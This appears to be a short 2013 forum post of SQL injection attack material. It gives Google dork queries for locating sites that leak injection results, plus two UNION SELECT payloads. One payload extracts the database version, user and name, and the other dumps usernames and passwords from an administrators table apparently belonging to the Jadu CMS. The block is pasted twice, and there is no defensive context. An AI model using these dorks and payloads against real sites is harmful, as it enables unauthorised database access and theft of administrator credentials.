حامد کیانمهر
15th March 2013, 01:39
inurl:"id=" & intext:"group_concat(...,0x3a,...)
inurl:(0x3a,version)
inurl:(@version,0x3a,databse)
inurl:(user,0x3a,pass)
inurl:UNION+ALL+SELECT
inurl:+union+select+from
inurl:+union+select+pass
inurl:unhex(hex(@@version))
inurl:(login_name,0x3a,password)
inurl:unhex(hex(concat(username,0x3a,password)))
SQL 1 : null+union+select+1,2,3,4,concat_ws(0x3a,version() ,user(),database()),6,7,8,9,10
,11,12--
SQL 2 : null+union+select+1,2,3,4,concat(username,0x3a,pas sword),6,7,8,9,10,11,12+from+J
aduAdministrators--
inurl:(0x3a,version)
inurl:(@version,0x3a,databse)
inurl:(user,0x3a,pass)
inurl:UNION+ALL+SELECT
inurl:+union+select+from
inurl:+union+select+pass
inurl:unhex(hex(@@version))
inurl:(login_name,0x3a,password)
inurl:unhex(hex(concat(username,0x3a,password)))
SQL 1 : null+union+select+1,2,3,4,concat_ws(0x3a,version() ,user(),database()),6,7,8,9,10
,11,12--
SQL 2 : null+union+select+1,2,3,4,concat(username,0x3a,pas sword),6,7,8,9,10,11,12+from+J
aduAdministrators--